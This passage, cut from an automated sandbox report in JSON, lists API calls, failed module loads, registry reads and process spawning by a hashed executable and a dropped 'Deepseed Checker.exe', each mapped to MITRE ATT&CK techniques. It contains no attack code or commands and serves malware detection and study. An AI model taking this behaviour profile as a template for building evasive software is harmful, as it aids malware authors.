\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\MICROS~3\\Office14\\GROOVEEX.DLL (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\office.odf (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003276)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-quirks-l1-1-0.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter mscoree.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\combase.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter psapi.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-xstate-l2-1-0.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter uxtheme.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en-US\\mscorrc.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\en\\mscorrc.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\VERSION.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter Deepseed Checker.exe (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %TEMP%\\hAifIHNdlq\\Deepseed Checker.exe (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\diasymreader.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00002512)\n \"Deepseed Checker.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002512)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-272", "type": 2, "relevance": 1, "name": "Contains ability to retrieve/open a process (API string)", "description": "Found reference to API \"GetProcessHeap\" (Indicator: \"GetProcessHeap\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" - [base:0; Status:c0000135]\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-2.dll\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"api-ms-win-appmodel-runtime-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"api-ms-win-core-quirks-l1-1-0.dll\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"%WINDIR%\\system32\\combase.dll\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\uxtheme.dll\" - [base:0; Status:c0000135]\n \"Deepseed Checker.exe\" failed to load missing module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\VERSION.dll\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77880000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77880000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64570000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64D20000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 64D20000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"Deepseed Checker.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"Deepseed Checker.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"Deepseed Checker.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"Deepseed Checker.exe\" (UID: 00000000-00002512)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"Deepseed Checker.exe\" (UID: 00000000-00002512)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter DecodePointer (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter EncodePointer (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetUserName (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetComputerName (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW 